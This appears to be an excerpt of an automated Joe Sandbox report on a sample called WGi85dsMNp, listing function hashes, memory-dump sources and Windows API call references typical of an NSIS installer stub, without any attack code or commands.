                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 81359150b7f4ac322ca8826be393b3b1f14f9d2f297b60a9fd0b44a003b78fdb
                                                                                                      • Instruction ID: 42e9639d8f893f1c4e4ed1818e39e6df1b1a3d1c3375d41f4778f0765bd87452
                                                                                                      • Opcode Fuzzy Hash: 81359150b7f4ac322ca8826be393b3b1f14f9d2f297b60a9fd0b44a003b78fdb
                                                                                                      • Instruction Fuzzy Hash: 00C18374E00258CFDB58DFA5C994B9DBBB2BF89300F1081A9D409AB365DB759E86CF10
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3943097874.00000000354B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 354B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_354b0000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 670ff3589cf9de8c8ae0a9ce882de8670a4462b44abb05d63081a778a605399f
                                                                                                      • Instruction ID: a35ef3feafd44465e19f7cb9120a59d62bfd96c897df004666e2ea5c6c829b6b
                                                                                                      • Opcode Fuzzy Hash: 670ff3589cf9de8c8ae0a9ce882de8670a4462b44abb05d63081a778a605399f
                                                                                                      • Instruction Fuzzy Hash: 02C19274E00258CFDB58DFA5C994B9DBBB2BF89300F1081A9D409AB365DB755E86CF10
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3943097874.00000000354B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 354B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_354b0000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 40f1eb015136737f54383dd04f1f5c4336563fcf9b0456f28dd7250ababea24f
                                                                                                      • Instruction ID: acc2efd8e438ae09525fa373dcf836daaa3ce7fb459e3fefde53d5d261ec0ee0
                                                                                                      • Opcode Fuzzy Hash: 40f1eb015136737f54383dd04f1f5c4336563fcf9b0456f28dd7250ababea24f
                                                                                                      • Instruction Fuzzy Hash: 1BC19274E01218CFDB58DFA5C994B9DBBB2BF89300F5080A9D409AB365DB759E86CF10
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3943097874.00000000354B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 354B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_354b0000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b54036ec7c7e0238c9b4029507de30454dc95e23129e82fb75f3f5585f617cc1
                                                                                                      • Instruction ID: ce8cd28e1a65901e409d1b9b2332dfc771ed3656db8395320a09aaf15931cbf6
                                                                                                      • Opcode Fuzzy Hash: b54036ec7c7e0238c9b4029507de30454dc95e23129e82fb75f3f5585f617cc1
                                                                                                      • Instruction Fuzzy Hash: 69C19274E00218CFDB58DFA5C954B9DBBB2BF89300F1081A9D809AB365DB755E86CF10
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3943097874.00000000354B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 354B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_354b0000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 141474445904241815ff067d5cae76091d00f2939b355bbe189e7d6a3c885e5b
                                                                                                      • Instruction ID: 5696d6a36251a4afa7fb4d952729f3e9b5f29ed30ed3624c3e0ef8ef14c2e9d5
                                                                                                      • Opcode Fuzzy Hash: 141474445904241815ff067d5cae76091d00f2939b355bbe189e7d6a3c885e5b
                                                                                                      • Instruction Fuzzy Hash: 65C19274E00218CFDB58DFA5C994B9DBBB2BF89300F1080A9D849AB365DB759D86CF10
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 602e301bef3d4d67644c5457aa752eea27b118962e822ae0748ac41f4bfbc741
                                                                                                      • Instruction ID: cd7458777027b4a7e8da2a66dd6aca1eb641097927a8b35cd532919aae1a1e02
                                                                                                      • Opcode Fuzzy Hash: 602e301bef3d4d67644c5457aa752eea27b118962e822ae0748ac41f4bfbc741
                                                                                                      • Instruction Fuzzy Hash: 86D09E74E4422C9ACF15DF64DC546ECB770FF9A340F0024A9C48DA7110D7B09E94DA55
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,00000403), ref: 004055ED
                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004055FC
                                                                                                      • GetClientRect.USER32(?,?), ref: 00405639
                                                                                                      • GetSystemMetrics.USER32(00000002), ref: 00405640
                                                                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                                                                                      • ShowWindow.USER32(?,00000008), ref: 004056DC
                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004056FD
                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 0040560B
                                                                                                        • Part of subcall function 00404394: SendMessageW.USER32(00000028,?,?,004041BF), ref: 004043A2
                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 0040574F
                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00405764
                                                                                                      • ShowWindow.USER32(00000000), ref: 00405788
                                                                                                      • ShowWindow.USER32(?,00000008), ref: 0040578D
                                                                                                      • ShowWindow.USER32(00000008), ref: 004057D7
                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                                                                                      • CreatePopupMenu.USER32 ref: 0040581C
                                                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
                                                                                                      • GetWindowRect.USER32(?,?), ref: 00405850
                                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                                                                                      • OpenClipboard.USER32(00000000), ref: 004058B1
                                                                                                      • EmptyClipboard.USER32 ref: 004058B7
                                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 004058CD
                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                                                                                      • CloseClipboard.USER32 ref: 00405912
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                      • String ID: (7B${
                                                                                                      • API String ID: 590372296-525222780
                                                                                                      • Opcode ID: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
                                                                                                      • Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
                                                                                                      • Opcode Fuzzy Hash: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
                                                                                                      • Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68
                                                                                                      APIs
                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                                                                                      • ShowWindow.USER32(?), ref: 00403EDF
                                                                                                      • DestroyWindow.USER32 ref: 00403EF3
                                                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
                                                                                                      • GetDlgItem.USER32(?,?), ref: 00403F30
                                                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                                                                                      • GetDlgItem.USER32(?,?), ref: 00403FF9
                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00404003
                                                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                                                                                      • SendMessageW.USER32(0000040F,00000000,?,?), ref: 0040406E
                                                                                                      • GetDlgItem.USER32(?,00000003), ref: 00404114
                                                                                                      • ShowWindow.USER32(00000000,?), ref: 00404135
                                                                                                      • EnableWindow.USER32(?,?), ref: 00404147
                                                                                                      • EnableWindow.USER32(?,?), ref: 00404162
                                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00404178
                                                                                                      • EnableMenuItem.USER32(00000000), ref: 0040417F
                                                                                                      • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00404197
                                                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                                                                                      • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
                                                                                                      • SetWindowTextW.USER32(?,00423728), ref: 004041E8
                                                                                                      • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                      • String ID: (7B
                                                                                                      • API String ID: 184305955-3251261122
                                                                                                      • Opcode ID: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
                                                                                                      • Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
                                                                                                      • Opcode Fuzzy Hash: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
                                                                                                      • Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D
                                                                                                      APIs
                                                                                                        • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                        • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                      • lstrcatW.KERNEL32(00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800,75923420,00435000,00000000), ref: 00403B59
                                                                                                      • lstrlenW.KERNEL32(004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800), ref: 00403BD9
                                                                                                      • lstrcmpiW.KERNEL32(004281D8,.exe,004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
                                                                                                      • GetFileAttributesW.KERNEL32(004281E0), ref: 00403BF7
                                                                                                      • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,00435800), ref: 00403C40
                                                                                                        • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                      • RegisterClassW.USER32(004291E0), ref: 00403C7D
                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
                                                                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
                                                                                                      • RegisterClassW.USER32(004291E0), ref: 00403D42
                                                                                                      • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                      • String ID: (7B$.DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                      • API String ID: 1975747703-1425696872
                                                                                                      • Opcode ID: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
                                                                                                      • Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
                                                                                                      • Opcode Fuzzy Hash: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
                                                                                                      • Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D
                                                                                                      APIs
                                                                                                      • CheckDlgButton.USER32(?,-0000040A,?), ref: 004045BC
                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004045D0
                                                                                                      • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 004045ED
                                                                                                      • GetSysColor.USER32(?), ref: 004045FE
                                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                                                                                      • lstrlenW.KERNEL32(?), ref: 0040461F
                                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                                                                                      • SendMessageW.USER32(00000000), ref: 004046A1
                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004046CC
                                                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                                                                                      • SetCursor.USER32(00000000), ref: 00404720
                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                                                                                      • SetCursor.USER32(00000000), ref: 0040473C
                                                                                                      • SendMessageW.USER32(00000111,?,00000000), ref: 0040476B
                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                      • String ID: N
                                                                                                      • API String ID: 3103080414-1130791706
                                                                                                      • Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                      • Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
                                                                                                      • Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                      • Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58
                                                                                                      APIs
                                                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                      • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                      • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                      • String ID: F
                                                                                                      • API String ID: 941294808-1304234792
                                                                                                      • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                      • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                                                                      • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                      • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 0040489F
                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                                                                                      • lstrcmpiW.KERNEL32(004281E0,00423728,00000000,?,?), ref: 004049B7
                                                                                                      • lstrcatW.KERNEL32(?,004281E0), ref: 004049C3
                                                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
                                                                                                        • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45
                                                                                                        • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,75923420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                        • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                        • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,75923420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                        • Part of subcall function 0040667C: CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,75923420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                      • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,?,004216F8,?,?,000003FB,?), ref: 00404A98
                                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                                                                        • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                        • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                                                                        • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                      • String ID: (7B$A
                                                                                                      • API String ID: 2624150263-3645020878
                                                                                                      • Opcode ID: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
                                                                                                      • Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
                                                                                                      • Opcode Fuzzy Hash: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
                                                                                                      • Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D
                                                                                                      APIs
                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                                                                                      • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078
                                                                                                        • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                        • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                      • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
                                                                                                      • wsprintfA.USER32 ref: 004060B3
                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
                                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
                                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
                                                                                                      • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                                                                        • Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
                                                                                                        • Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                      • String ID: %ls=%ls$[Rename]
                                                                                                      • API String ID: 2171350718-461813615
                                                                                                      • Opcode ID: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
                                                                                                      • Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
                                                                                                      • Opcode Fuzzy Hash: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
                                                                                                      • Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD
                                                                                                      APIs
                                                                                                      • GetTickCount.KERNEL32 ref: 00402F44
                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400), ref: 00402F60
                                                                                                        • Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
                                                                                                        • Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,00438800,00438800,80000000,00000003), ref: 00402FA9
                                                                                                      • GlobalAlloc.KERNEL32(00000040,0040A230), ref: 004030F0
                                                                                                      Strings
                                                                                                      • Error launching installer, xrefs: 00402F80
                                                                                                      • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403139
                                                                                                      • Null, xrefs: 00403029
                                                                                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403187
                                                                                                      • Inst, xrefs: 00403017
                                                                                                      • soft, xrefs: 00403020
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
